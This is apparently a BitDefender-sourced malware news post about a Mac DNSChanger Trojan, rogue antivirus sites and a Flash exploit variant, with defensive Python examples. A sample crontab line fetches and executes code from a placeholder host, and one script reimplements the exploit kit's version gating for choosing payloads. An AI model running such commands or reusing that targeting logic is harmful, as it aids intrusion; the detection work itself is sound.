This is a Trojan downloader for Mac OS X. It usually
comes as a disk image posing as a key generator/crack for various applications or as a
video codec required for online streaming. Once mounted, the image presents an installer
package which contains several files. Three of these files are of interest: Archive.pax.gz (which contains two files: AdobeFlash,
Mozzilaplug.plugin), preinstall and preupgrade. "AdobeFlash", "preinstall" and "preupgrade" are exactly the
same file (a bash script).
Once executed, the script drops a file
using the uudecode command. This file is another shell script which installs a
crontab entry that polls a remote server every 5 minutes for new files to download.
If a file is found and downloaded, it is executed silently.
This file is detected by BitDefender as MAC.OSX.Trojan.DNSChanger.A and changes
the system's DNS server address. As a result, users who think they are
browsing to www.google.co.uk are directed to a bogus website of the attacker's choice.
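The two persistence and impact artifacts described above (a high-frequency fetch-and-execute cron job, and DNS servers that no longer match what the administrator configured) are what a host check would look for. The following script is an added example written for this page, not BitDefender's code or the malware's own crontab line: it parses `crontab -l` style text for entries that run at most every N minutes and both download and execute something, and it compares the nameservers in `scutil --dns` style output against an allowlist. The sample crontab and DNS output are constructed, and the URL and paths in them are placeholders.

```python
import re

# Constructed sample in the shape of `crontab -l` output: one benign entry and
# one modelled on the behaviour described above. The host and paths are made up.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
*/5 * * * * /usr/bin/curl -s http://updates.example.invalid/next > /tmp/.x && /bin/sh /tmp/.x
"""

# Constructed sample in the shape of `scutil --dns` output (macOS resolver listing).
SAMPLE_DNS = """\
resolver #1
  nameserver[0] : 203.0.113.7
  nameserver[1] : 203.0.113.8
"""

# Tools that fetch content from the network, and interpreters that run it.
FETCH_TOOLS = re.compile(r'\b(curl|wget|ftp|fetch)\b')
EXEC_TOOLS = re.compile(r'\b(sh|bash|zsh|perl|python|ruby|osascript)\b')


def parse_crontab(text):
    """Split crontab text into dicts with the five time fields and the command."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # environment assignments or malformed lines
        minute, hour, dom, mon, dow, command = fields
        entries.append({'minute': minute, 'hour': hour, 'dom': dom,
                        'mon': mon, 'dow': dow, 'command': command})
    return entries


def runs_at_most_every(entry, minutes):
    """True if the minute field is a */N step with N <= minutes."""
    m = re.fullmatch(r'\*/(\d+)', entry['minute'])
    return m is not None and int(m.group(1)) <= minutes


def is_fetch_and_exec(command):
    """True if the command both downloads something and hands it to an interpreter."""
    return bool(FETCH_TOOLS.search(command)) and bool(EXEC_TOOLS.search(command))


def suspicious_cron_entries(text, max_interval_minutes=5):
    """Entries that poll frequently and execute whatever they fetched."""
    return [e for e in parse_crontab(text)
            if runs_at_most_every(e, max_interval_minutes)
            and is_fetch_and_exec(e['command'])]


def nameservers(scutil_output):
    """Extract nameserver addresses from `scutil --dns` style text."""
    return re.findall(r'nameserver\[\d+\]\s*:\s*(\S+)', scutil_output)


def unexpected_nameservers(scutil_output, allowed):
    """Nameservers present on the host that are not in the administrator's allowlist."""
    return [ns for ns in nameservers(scutil_output) if ns not in allowed]


if __name__ == '__main__':
    for e in suspicious_cron_entries(SAMPLE_CRONTAB):
        print('suspicious cron entry:', e['command'])
    # 192.0.2.53 stands in for the resolver the admin actually configured.
    for ns in unexpected_nameservers(SAMPLE_DNS, allowed={'192.0.2.53'}):
        print('unexpected nameserver:', ns)
```

On a real host you would feed the functions the output of `crontab -l` (for every user, plus /etc/crontab and the cron.d directories) and `scutil --dns`; the regexes are deliberately simple, so treat a hit as something to look at rather than a verdict.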
It is suspected that this Trojan has
the same source as the newer Trojan.Zlob (aka Trojan.DNSChanger) versions, which
have essentially the same effect on Microsoft Windows operating systems. More
information about this will follow in the next few days.
Yet another attempt to fool unsuspecting users
into downloading and installing rogue antivirus software. With a new design,
they are pushing the same fake products after an "online scan" that detected
lots of malware on the victim's computer. Nothing new in this territory from a
technological point of view. Here are a couple of screenshots of the new design,
however. Beware of these websites!
What this version brings with it are just
new methods of obfuscation intended to evade AV detection. It is a weaker
variant of Trojan.Exploit.SSX,
meaning it only tries to exploit browsers with vulnerable Flash Players. It
uses the deconcept JavaScript class library to detect the Flash
version running on the victim's machine. Based on that, it serves different SWF
objects, which try to exploit the already known
vulnerability.
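The gating step in that description is simple: read the Flash plugin's version string from the browser (`navigator.plugins["Shockwave Flash"].description` in Netscape-style browsers, the ActiveX `$version` string on IE), parse it into comparable numbers, and only serve an exploit SWF to versions inside a known-vulnerable range. The following Python is an added example written for this page, not code from the exploit kit or from deconcept's library, and it shows that logic in reusable form: a parser for both version-string formats and a range-gated payload selector. The version strings are constructed samples, and the version ranges in `HYPOTHETICAL_RANGES` are placeholders, not the versions actually affected by the vulnerability the post refers to.

```python
import re

# Constructed samples of the strings a browser exposes for the Flash plugin.
# The first three follow the plugin description format, the last the IE
# ActiveX "$version" format.
SAMPLE_DESCRIPTIONS = [
    "Shockwave Flash 9.0 r115",
    "Shockwave Flash 9.0 r124",
    "Shockwave Flash 10.0 r12",
    "WIN 9,0,115,0",
]

# Matches "9.0 r115" as well as "9,0,115"; captures major, minor, revision.
VERSION_RE = re.compile(r'(\d+)[.,](\d+)(?:\s*r|[.,])(\d+)')

# Placeholder ranges for illustration only: (min_inclusive, max_exclusive, payload).
# They do NOT describe the real affected versions; substitute the advisory's data.
HYPOTHETICAL_RANGES = [
    ((9, 0, 0), (9, 0, 124), 'exploit_a.swf'),
    ((9, 0, 124), (9, 0, 125), 'exploit_b.swf'),
]


def parse_flash_version(description):
    """Return (major, minor, revision) from a Flash version string, or None."""
    m = VERSION_RE.search(description)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def choose_payload(version, ranges):
    """First range containing `version` wins; None means 'serve nothing'.

    Browsers with no Flash, or with a version outside every range, get no SWF,
    which is what keeps the kit from wasting a payload on patched targets.
    """
    if version is None:
        return None
    for lo, hi, payload in ranges:
        if lo <= version < hi:  # tuple comparison is lexicographic
            return payload
    return None


def gate(description, ranges=HYPOTHETICAL_RANGES):
    """Parse a version string and pick the payload for it, if any."""
    return choose_payload(parse_flash_version(description), ranges)


if __name__ == '__main__':
    for d in SAMPLE_DESCRIPTIONS:
        print(f'{d!r:32} -> {parse_flash_version(d)} -> {gate(d)}')
```

The same parser is useful on the defensive side: run it over the version strings your fleet reports and flag anything below the build your patch policy requires.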
Information in this article is available courtesy of BitDefender virus researchers: Daniel Chipiristeanu, Daniel Radu